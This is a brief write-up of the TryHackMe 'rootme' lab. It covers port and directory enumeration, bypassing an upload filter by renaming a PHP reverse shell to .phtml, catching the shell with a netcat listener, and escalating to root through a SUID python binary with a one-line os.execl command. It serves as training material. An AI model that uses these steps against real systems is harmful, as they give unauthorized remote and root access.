# Try Hack Me | rootme

## PROBE
* 22 OpenSSH 7.6p1
* 80 Apache 2.4.29

### gobuster
* /panel - page to upload
* /uploads - folder (i guess to see uploaded files from panel)


## VULNS

* /panel

## EXPLOIT

uploaded php reverse shell
needed to bypass form validation by renaming .php to .phtml

php reverse shell was setup to connect to my machine on port 3317
so i started listening on with netcat 
``` bash
nc 10.8.221.3 -v -n -l -p 3317
```
after triggering reverse shell with curl
``` bash
curl TARGET_IP/uploads/reverse_shell.phtml
```

I had access to target machine but only with *www-data* user
to escalate i search for files with SUID root (thats those perm)
``` bash
find / -user root -perm /4000
```

permission 4000 / SUID : allows to run program with owner permissions
so this find will return files thats own by root and when we run them they are run as root

this returns bunch of files but there is python (/usr/bin/python) and we can run inline python scripts with python -c "PYTHON CODE"

(about priv escalation [gtfobins](https://gtfobins.github.io/)
and with some fancy-pancy priv escalation running
```bash
python -c 'import os; os.execl("/bin/sh", "sh", "-p")
```
that -p tag tries to not reset privs

and that should put us in root shell
